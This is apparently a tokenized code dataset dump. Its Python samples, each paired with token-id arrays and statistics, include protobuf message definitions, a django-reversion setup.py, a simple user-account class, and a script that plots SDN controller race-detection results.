198,
220,
220,
220,
1303,
27841,
1961,
318,
281,
1785,
543,
8833,
618,
257,
9794,
318,
2087,
284,
262,
1353,
1435,
198,
220,
220,
220,
27841,
1961,
796,
352,
198,
220,
220,
220,
1303,
471,
49316,
318,
281,
1785,
543,
8833,
618,
257,
9794,
318,
6153,
198,
220,
220,
220,
471,
49316,
796,
362,
198,
220,
220,
220,
1303,
22657,
8874,
1961,
318,
281,
1785,
543,
8833,
618,
257,
9794,
318,
4615,
422,
262,
198,
220,
220,
220,
1303,
8398,
198,
220,
220,
220,
22657,
8874,
1961,
796,
513,
628,
198,
31,
19608,
330,
31172,
7,
27363,
28,
25101,
11,
41575,
28,
25101,
8,
198,
4871,
8670,
9012,
18453,
7,
27903,
1676,
1462,
13,
12837,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
8670,
9012,
18453,
318,
257,
3275,
329,
31577,
3497,
18257,
9012,
12405,
10007,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1303,
383,
2581,
318,
1464,
287,
262,
4732,
286,
257,
16232,
4522,
13,
1002,
262,
3335,
857,
407,
198,
220,
220,
220,
1303,
2152,
393,
318,
28597,
281,
4049,
481,
307,
4504,
13,
198,
220,
220,
220,
3335,
62,
312,
25,
965,
796,
1365,
1676,
1462,
13,
8841,
62,
3245,
7,
16,
8,
198,
220,
220,
220,
1303,
12383,
9217,
1771,
284,
12383,
284,
2995,
357,
68,
13,
70,
13,
27841,
11,
35717,
11,
290,
198,
220,
220,
220,
1303,
22657,
46,
6089,
8,
326,
3051,
706,
477,
13532,
329,
262,
3335,
423,
587,
35377,
284,
262,
198,
220,
220,
220,
1303,
5456,
198,
220,
220,
220,
12383,
25,
20512,
796,
1365,
1676,
1462,
13,
30388,
62,
3245,
7,
17,
8,
628,
198,
31,
19608,
330,
31172,
7,
27363,
28,
25101,
11,
41575,
28,
25101,
8,
628,
198,
31,
19608,
330,
31172,
7,
27363,
28,
25101,
11,
41575,
28,
25101,
8,
198,
4871,
7343,
26245,
19400,
18453,
7,
27903,
1676,
1462,
13,
12837,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
7343,
26245,
19400,
18453,
7007,
257,
4269,
286,
2458,
290,
5992,
284,
606,
198,
220,
220,
220,
2750,
4277,
11,
262,
2581,
7007,
257,
4269,
286,
477,
2458,
326,
389,
1944,
198,
220,
220,
220,
287,
262,
1353,
1435,
618,
262,
2581,
318,
2722,
416,
262,
2139,
13,
2102,
11,
611,
198,
220,
220,
220,
4600,
7266,
12522,
63,
318,
4600,
7942,
47671,
262,
4269,
481,
3520,
1280,
706,
477,
2458,
423,
198,
220,
220,
220,
587,
1908,
290,
2995,
326,
3051,
1708,
262,
938,
2458,
481,
307,
35377,
198,
220,
220,
220,
284,
262,
5456,
1566,
262,
4269,
318,
4838,
13,
1002,
366,
19419,
3041,
1759,
1,
318,
2081,
788,
198,
220,
220,
220,
691,
2458,
326,
1645,
706,
262,
869,
481,
307,
4504,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1303,
12383,
9217,
1771,
284,
12383,
284,
2995,
357,
68,
13,
70,
13,
27841,
11,
35717,
11,
290,
198,
220,
220,
220,
1303,
22657,
46,
6089,
8,
326,
3051,
706,
477,
4410,
423,
587,
35377,
284,
262,
5456,
198,
220,
220,
220,
12383,
25,
20512,
796,
1365,
1676,
1462,
13,
30388,
62,
3245,
7,
16,
8,
198,
220,
220,
220,
1303,
3038,
284,
11986,
257,
2176,
3127,
1487,
532,
611,
9178,
393,
705,
9,
6,
788,
2922,
198,
220,
220,
220,
1303,
477,
1680,
1104,
4600,
9,
63,
357,
15699,
867,
34534,
8,
393,
705,
8348,
357,
15699,
530,
1149,
8,
355,
4295,
9517,
198,
220,
220,
220,
1487,
312,
25,
965,
796,
1365,
1676,
1462,
13,
8841,
62,
3245,
7,
17,
8,
198,
220,
220,
220,
1303,
3038,
284,
2581,
691,
2458,
326,
1645,
706,
262,
869,
198,
220,
220,
220,
1231,
62,
260,
1759,
25,
20512,
796,
1365,
1676,
1462,
13,
30388,
62,
3245,
7,
18,
8,
628,
198,
31,
19608,
330,
31172,
7,
27363,
28,
25101,
11,
41575,
28,
25101,
8,
198,
4871,
7343,
26245,
19400,
31077,
7,
27903,
1676,
1462,
13,
12837,
2599,
198,
220,
220,
220,
37227,
8053,
26245,
19400,
31077,
10732,
257,
2060,
3127,
1487,
1785,
37811,
628,
220,
220,
220,
1303,
1487,
318,
262,
3127,
1487,
319,
543,
262,
1785,
5091,
198,
220,
220,
220,
1487,
25,
45434,
3803,
62,
27349,
834,
13,
26245,
19400,
1,
796,
1365,
1676,
1462,
13,
20500,
62,
3245,
7,
16,
8,
198,
220,
220,
220,
1303,
2099,
318,
257,
28587,
286,
262,
2099,
286,
1487,
852,
925,
198,
220,
220,
220,
2099,
25,
366,
6030,
1,
796,
1365,
1676,
1462,
13,
44709,
62,
3245,
7,
17,
8,
628,
198,
31,
19608,
330,
31172,
7,
27363,
28,
25101,
11,
41575,
28,
25101,
8,
198,
4871,
7343,
24728,
19400,
18453,
7,
27903,
1676,
1462,
13,
12837,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
7343,
24728,
19400,
18453,
7007,
257,
4269,
286,
2458,
290,
5992,
284,
606,
2750,
198,
220,
220,
220,
4277,
11,
262,
2581,
7007,
257,
4269,
286,
477,
2458,
326,
389,
1944,
287,
198,
220,
220,
220,
262,
1353,
1435,
618,
262,
2581,
318,
2722,
416,
262,
2139,
13,
2102,
11,
611,
198,
220,
220,
220,
4600,
7266,
12522,
63,
318,
4600,
7942,
47671,
262,
4269,
481,
3520,
1280,
706,
477,
2458,
423,
198,
220,
220,
220,
587,
1908,
290,
2995,
326,
3051,
1708,
262,
938,
2458,
481,
307,
35377,
198,
220,
220,
220,
284,
262,
5456,
1566,
262,
4269,
318,
4838,
13,
1002,
366,
19419,
3041,
1759,
1,
318,
2081,
788,
198,
220,
220,
220,
691,
2458,
326,
1645,
706,
262,
869,
481,
307,
4504,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1303,
12383,
9217,
1771,
284,
12383,
284,
2995,
357,
68,
13,
70,
13,
27841,
11,
35717,
11,
290,
198,
220,
220,
220,
1303,
22657,
46,
6089,
8,
326,
3051,
706,
477,
4410,
423,
587,
35377,
284,
262,
5456,
198,
220,
220,
220,
12383,
25,
20512,
796,
1365,
1676,
1462,
13,
30388,
62,
3245,
7,
16,
8,
198,
220,
220,
220,
1303,
3038,
284,
11986,
257,
2176,
3335,
1487,
532,
611,
9178,
393,
705,
9,
6,
788,
2922,
198,
220,
220,
220,
1303,
477,
1680,
1104,
4600,
9,
63,
357,
15699,
867,
34534,
8,
393,
705,
8348,
357,
15699,
530,
1149,
8,
355,
4295,
9517,
198,
220,
220,
220,
3335,
62,
312,
25,
965,
796,
1365,
1676,
1462,
13,
8841,
62,
3245,
7,
17,
8,
198,
220,
220,
220,
1303,
3335,
62,
9641,
318,
281,
11902,
3335,
2196,
198,
220,
220,
220,
3335,
62,
9641,
25,
965,
796,
1365,
1676,
1462,
13,
8841,
62,
3245,
7,
18,
8,
198,
220,
220,
220,
1303,
3038,
284,
2581,
691,
2458,
326,
1645,
706,
262,
869,
198,
220,
220,
220,
1231,
62,
260,
1759,
25,
20512,
796,
1365,
1676,
1462,
13,
30388,
62,
3245,
7,
19,
8,
628,
198,
31,
19608,
330,
31172,
7,
27363,
28,
25101,
11,
41575,
28,
25101,
8,
198,
4871,
7343,
24728,
19400,
31077,
7,
27903,
1676,
1462,
13,
12837,
2599,
198,
220,
220,
220,
37227,
8053,
24728,
19400,
31077,
10732,
257,
2060,
3127,
1487,
1785,
37811,
628,
220,
220,
220,
1303,
1487,
318,
262,
3335,
1487,
319,
543,
262,
1785,
5091,
198,
220,
220,
220,
1487,
25,
45434,
3803,
62,
25202,
834,
13,
24728,
19400,
1,
796,
1365,
1676,
1462,
13,
20500,
62,
3245,
7,
16,
8,
198,
220,
220,
220,
1303,
2099,
318,
257,
28587,
286,
262,
2099,
286,
1487,
852,
925,
198,
220,
220,
220,
2099,
25,
366,
6030,
1,
796,
1365,
1676,
1462,
13,
44709,
62,
3245,
7,
17,
8,
628,
628,
628,
198,
6738,
11485,
1330,
13169,
355,
4808,
28482,
834,
198,
6738,
11485,
3803,
1330,
3335,
355,
4808,
3803,
62,
25202,
834,
198,
6738,
11485,
3803,
1330,
3127,
355,
4808,
3803,
62,
27349,
834,
198
] | 3.394155 | 1,403 |
import sys
sys.path.insert(0, 'src/reversion')
from distutils.core import setup
from version import __version__
# Load in babel support, if available.
try:
from babel.messages import frontend as babel
cmdclass = {"compile_catalog": babel.compile_catalog,
"extract_messages": babel.extract_messages,
"init_catalog": babel.init_catalog,
"update_catalog": babel.update_catalog,}
except ImportError:
cmdclass = {}
setup(name="django-reversion",
version='.'.join(str(x) for x in __version__),
license="BSD",
description="An extension to the Django web framework that provides comprehensive version control facilities",
long_description=open("README.markdown").read(),
author="Dave Hall",
author_email="[email protected]",
url="http://github.com/etianen/django-reversion",
zip_safe=False,
packages=["reversion", "reversion.management", "reversion.management.commands", "reversion.migrations"],
package_dir={"": "src"},
package_data = {"reversion": ["locale/*/LC_MESSAGES/django.*", "templates/reversion/*.html"]},
cmdclass = cmdclass,
classifiers=["Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Framework :: Django",])
| [
11748,
25064,
198,
17597,
13,
6978,
13,
28463,
7,
15,
11,
705,
10677,
14,
260,
9641,
11537,
198,
6738,
1233,
26791,
13,
7295,
1330,
9058,
198,
6738,
2196,
1330,
11593,
9641,
834,
628,
198,
2,
8778,
287,
9289,
417,
1104,
11,
611,
1695,
13,
198,
28311,
25,
198,
220,
220,
220,
422,
9289,
417,
13,
37348,
1095,
1330,
2166,
437,
355,
9289,
417,
198,
220,
220,
220,
23991,
4871,
796,
19779,
5589,
576,
62,
9246,
11794,
1298,
9289,
417,
13,
5589,
576,
62,
9246,
11794,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
2302,
974,
62,
37348,
1095,
1298,
9289,
417,
13,
2302,
974,
62,
37348,
1095,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15003,
62,
9246,
11794,
1298,
9289,
417,
13,
15003,
62,
9246,
11794,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
19119,
62,
9246,
11794,
1298,
9289,
417,
13,
19119,
62,
9246,
11794,
11,
92,
198,
16341,
17267,
12331,
25,
198,
220,
220,
220,
23991,
4871,
796,
23884,
198,
198,
40406,
7,
3672,
2625,
28241,
14208,
12,
260,
9641,
1600,
198,
220,
220,
220,
220,
220,
2196,
11639,
2637,
13,
22179,
7,
2536,
7,
87,
8,
329,
2124,
287,
11593,
9641,
834,
828,
198,
220,
220,
220,
220,
220,
5964,
2625,
21800,
1600,
198,
220,
220,
220,
220,
220,
6764,
2625,
2025,
7552,
284,
262,
37770,
3992,
9355,
326,
3769,
9815,
2196,
1630,
7291,
1600,
198,
220,
220,
220,
220,
220,
890,
62,
11213,
28,
9654,
7203,
15675,
11682,
13,
4102,
2902,
11074,
961,
22784,
198,
220,
220,
220,
220,
220,
1772,
2625,
27984,
4789,
1600,
198,
220,
220,
220,
220,
220,
1772,
62,
12888,
2625,
67,
1015,
31,
316,
666,
268,
13,
785,
1600,
198,
220,
220,
220,
220,
220,
19016,
2625,
4023,
1378,
12567,
13,
785,
14,
316,
666,
268,
14,
28241,
14208,
12,
260,
9641,
1600,
198,
220,
220,
220,
220,
220,
19974,
62,
21230,
28,
25101,
11,
198,
220,
220,
220,
220,
220,
10392,
28,
14692,
260,
9641,
1600,
366,
260,
9641,
13,
27604,
1600,
366,
260,
9641,
13,
27604,
13,
9503,
1746,
1600,
366,
260,
9641,
13,
76,
3692,
602,
33116,
198,
220,
220,
220,
220,
220,
5301,
62,
15908,
28,
4895,
1298,
366,
10677,
25719,
198,
220,
220,
220,
220,
220,
5301,
62,
7890,
796,
19779,
260,
9641,
1298,
14631,
17946,
1000,
15211,
14,
5639,
62,
44,
1546,
4090,
48075,
14,
28241,
14208,
15885,
1600,
366,
11498,
17041,
14,
260,
9641,
15211,
13,
6494,
8973,
5512,
198,
220,
220,
220,
220,
220,
23991,
4871,
796,
23991,
4871,
11,
198,
220,
220,
220,
220,
220,
1398,
13350,
28,
14692,
41206,
12678,
7904,
642,
532,
19174,
14,
1273,
540,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
31441,
7904,
5313,
9344,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
5317,
1631,
7591,
1240,
7904,
34152,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34156,
7904,
7294,
40,
20010,
1079,
7904,
347,
10305,
13789,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
18843,
803,
4482,
7904,
7294,
13362,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
21055,
6433,
7904,
37770,
1600,
12962,
198
] | 2.458003 | 631 |
import random
class Account_user:
"""
Class to create new user accounts and save information
"""
users_list = []
def __init__(self,first_name,password):
'''
Method that helps us define properties that each user account will have
Args:
first_name : main account user name
password : main account password
'''
self.first_name = first_name
self.password = password
def save_user(self):
'''
Method to save new user account objects into users_list
'''
Account_user.users_list.append(self)
| [
11748,
4738,
198,
4871,
10781,
62,
7220,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
5016,
284,
2251,
649,
2836,
5504,
290,
3613,
1321,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
2985,
62,
4868,
796,
17635,
628,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
11,
11085,
62,
3672,
11,
28712,
2599,
198,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
220,
220,
220,
220,
11789,
326,
5419,
514,
8160,
6608,
326,
1123,
2836,
1848,
481,
423,
198,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
717,
62,
3672,
1058,
220,
1388,
1848,
2836,
1438,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9206,
1058,
220,
1388,
1848,
9206,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11085,
62,
3672,
796,
717,
62,
3672,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
28712,
796,
9206,
628,
220,
220,
220,
825,
3613,
62,
7220,
7,
944,
2599,
628,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
220,
220,
220,
220,
11789,
284,
3613,
649,
2836,
1848,
5563,
656,
2985,
62,
4868,
198,
220,
220,
220,
220,
220,
220,
220,
705,
7061,
628,
220,
220,
220,
220,
220,
220,
220,
10781,
62,
7220,
13,
18417,
62,
4868,
13,
33295,
7,
944,
8,
220,
220,
220,
220,
220,
628,
628
] | 2.438462 | 260 |
#!/usr/bin/env python
import argparse
import csv
import glob
import os
import itertools
from pylab import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from asyncore import loop
# Values we care about
keys = []
keys.append('num_read')
keys.append('num_writes')
keys.append('num_ops')
keys.append('num_rw_time_edges')
keys.append('num_ww_time_edges')
keys.append('num_time_edges')
keys.append('num_harmful')
keys.append('num_commute')
keys.append('num_races')
keys.append('num_covered')
keys.append('num_per_pkt_races')
keys.append('num_per_pkt_inconsistent')
keys.append('num_per_pkt_inconsistent_covered')
keys.append('num_per_pkt_entry_version_race')
keys.append('num_per_pkt_inconsistent_no_repeat')
keys.append('total_time_sec')
keys.append('load_time_sec')
keys.append('detect_races_time_sec')
keys.append('extract_traces_time_sec')
keys.append('find_reactive_cmds_time_sec')
keys.append('find_proactive_cmds_time_sec')
keys.append('find_covered_races_time')
keys.append('per_packet_inconsistent_time_sec')
keys.append('find_inconsistent_update_time_sec')
per_pkt_consistency = ['num_per_pkt_races', 'num_per_pkt_inconsistent',
'num_per_pkt_inconsistent_covered',
'num_per_pkt_entry_version_race']
prefixes = ['True-','False-']
timing_values = {'0': 0,
'1': 1,
'2': 2,
'3': 3,
'4': 4,
'5': 5,
'6': 6,
'7': 7,
'8': 8,
'9': 9,
'10': 10,
'inf': 11, # hack for plots
}
sorted_timing_values = sorted(timing_values.items(), key=lambda x: x[1])
# http://matplotlib.org/api/markers_api.html
markers = ['x',
'+',
'.',
'o',
'*',
# ',',
'1',
'2',
'3',
'4',
'8',
'<',
'>',
'D',
'H',
'^',
'_',
'd',
'h',
'p',
's',
'v',
'|',
0,
1,
2,
3,
4,
5,
6,
7,]
def get_correct_alt_barr_prefix(name):
"""
Whether to use alt-barr results or not. Should be True for purely reactive controllers, and False for proactive controllers that use barriers.
"""
prefix_for_name = {}
prefix_for_name['trace_floodlight_learningswitch-StarTopology2-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-StarTopology4-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-StarTopology8-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-BinaryLeafTreeTopology1-steps200'] = True
prefix_for_name['trace_floodlight_learningswitch-BinaryLeafTreeTopology2-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology2-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology4-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-StarTopology8-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-BinaryLeafTreeTopology1-steps200'] = True
prefix_for_name['trace_floodlight_forwarding-BinaryLeafTreeTopology2-steps200'] = True
prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology1-steps200'] = False
# prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology1-steps400'] = False
prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology2-steps200'] = False
# prefix_for_name['trace_floodlight_circuitpusher-BinaryLeafTreeTopology2-steps400'] = False
# consistent, barriers
prefix_for_name['trace_pox_ConsistencyTopology-False-False-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-False-True-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-True-False-steps200'] = True
prefix_for_name['trace_pox_ConsistencyTopology-True-True-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-BinaryLeafTreeTopology1-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-BinaryLeafTreeTopology2-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-StarTopology2-steps200'] = True
# prefix_for_name['trace_pox_l2_multi-StarTopology4-steps200'] = True
prefix_for_name['trace_onos-ifwd-StarTopology2-steps200'] = False
prefix_for_name['trace_onos-ifwd-MeshTopology2-steps200'] = False
prefix_for_name['trace_onos-ifwd-BinaryLeafTreeTopology1-steps200'] = False
prefix_for_name['trace_onos-ifwd-BinaryLeafTreeTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-StarTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-MeshTopology2-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-BinaryLeafTreeTopology1-steps200'] = False
prefix_for_name['trace_onos-noinstr-ifwd-BinaryLeafTreeTopology2-steps200'] = False
if name in prefix_for_name:
if prefix_for_name[name]:
return 'True-'
else:
return 'False-'
else:
print "get_correct_alt_barr_prefix() unknown for " + name
return # nothing
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('result_dirs', nargs='+' )
parser.add_argument('--no-plots', dest='no_plots', action='store_true',
default=False, help="Do not write any plot PDFs to the disk.")
args = parser.parse_args()
main(args.result_dirs, args.no_plots)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
628,
198,
11748,
1822,
29572,
198,
11748,
269,
21370,
198,
11748,
15095,
198,
11748,
28686,
198,
11748,
340,
861,
10141,
198,
6738,
279,
2645,
397,
1330,
1635,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
6738,
2603,
29487,
8019,
13,
1891,
2412,
13,
1891,
437,
62,
12315,
1330,
350,
7568,
47798,
198,
6738,
355,
2047,
7295,
1330,
9052,
628,
198,
2,
27068,
356,
1337,
546,
198,
13083,
796,
17635,
198,
13083,
13,
33295,
10786,
22510,
62,
961,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
8933,
274,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
2840,
11537,
198,
198,
13083,
13,
33295,
10786,
22510,
62,
31653,
62,
2435,
62,
276,
3212,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
1383,
62,
2435,
62,
276,
3212,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
2435,
62,
276,
3212,
11537,
198,
198,
13083,
13,
33295,
10786,
22510,
62,
29155,
913,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
9503,
1133,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
81,
2114,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
32111,
11537,
198,
198,
13083,
13,
33295,
10786,
22510,
62,
525,
62,
79,
21841,
62,
81,
2114,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
525,
62,
79,
21841,
62,
1939,
684,
7609,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
525,
62,
79,
21841,
62,
1939,
684,
7609,
62,
32111,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
525,
62,
79,
21841,
62,
13000,
62,
9641,
62,
16740,
11537,
198,
13083,
13,
33295,
10786,
22510,
62,
525,
62,
79,
21841,
62,
1939,
684,
7609,
62,
3919,
62,
44754,
11537,
198,
198,
13083,
13,
33295,
10786,
23350,
62,
2435,
62,
2363,
11537,
198,
13083,
13,
33295,
10786,
2220,
62,
2435,
62,
2363,
11537,
198,
13083,
13,
33295,
10786,
15255,
478,
62,
81,
2114,
62,
2435,
62,
2363,
11537,
198,
13083,
13,
33295,
10786,
2302,
974,
62,
2213,
2114,
62,
2435,
62,
2363,
11537,
198,
13083,
13,
33295,
10786,
19796,
62,
260,
5275,
62,
28758,
82,
62,
2435,
62,
2363,
11537,
198,
13083,
13,
33295,
10786,
19796,
62,
1676,
5275,
62,
28758,
82,
62,
2435,
62,
2363,
11537,
198,
13083,
13,
33295,
10786,
19796,
62,
32111,
62,
81,
2114,
62,
2435,
11537,
198,
13083,
13,
33295,
10786,
525,
62,
8002,
316,
62,
1939,
684,
7609,
62,
2435,
62,
2363,
11537,
198,
13083,
13,
33295,
10786,
19796,
62,
1939,
684,
7609,
62,
19119,
62,
2435,
62,
2363,
11537,
628,
198,
525,
62,
79,
21841,
62,
5936,
396,
1387,
796,
220,
37250,
22510,
62,
525,
62,
79,
21841,
62,
81,
2114,
3256,
705,
22510,
62,
525,
62,
79,
21841,
62,
1939,
684,
7609,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22510,
62,
525,
62,
79,
21841,
62,
1939,
684,
7609,
62,
32111,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22510,
62,
525,
62,
79,
21841,
62,
13000,
62,
9641,
62,
16740,
20520,
198,
40290,
274,
796,
37250,
17821,
12,
41707,
25101,
19355,
60,
198,
198,
16514,
278,
62,
27160,
796,
1391,
6,
15,
10354,
657,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
16,
10354,
352,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
17,
10354,
362,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
18,
10354,
513,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
19,
10354,
604,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
20,
10354,
642,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
21,
10354,
718,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22,
10354,
767,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
23,
10354,
807,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
24,
10354,
860,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
940,
10354,
838,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
10745,
10354,
1367,
11,
1303,
8156,
329,
21528,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1782,
198,
198,
82,
9741,
62,
16514,
278,
62,
27160,
796,
23243,
7,
16514,
278,
62,
27160,
13,
23814,
22784,
1994,
28,
50033,
2124,
25,
2124,
58,
16,
12962,
198,
198,
2,
2638,
1378,
6759,
29487,
8019,
13,
2398,
14,
15042,
14,
4102,
364,
62,
15042,
13,
6494,
198,
4102,
364,
796,
37250,
87,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
10,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
2637,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
78,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
9,
3256,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
46083,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
16,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
17,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
18,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
19,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
23,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
27,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
29,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
35,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
39,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
61,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
67,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
71,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
79,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
82,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
85,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
91,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
352,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
362,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
513,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
604,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
642,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
718,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
767,
11,
60,
628,
198,
4299,
651,
62,
30283,
62,
2501,
62,
65,
3258,
62,
40290,
7,
3672,
2599,
198,
220,
37227,
198,
220,
10127,
284,
779,
5988,
12,
65,
3258,
2482,
393,
407,
13,
10358,
307,
6407,
329,
14177,
32242,
20624,
11,
290,
10352,
329,
33943,
20624,
326,
779,
14725,
13,
198,
220,
37227,
198,
220,
21231,
62,
1640,
62,
3672,
796,
23884,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
35720,
654,
42248,
12,
8248,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
35720,
654,
42248,
12,
8248,
9126,
1435,
19,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
35720,
654,
42248,
12,
8248,
9126,
1435,
23,
12,
20214,
2167,
20520,
796,
6407,
198,
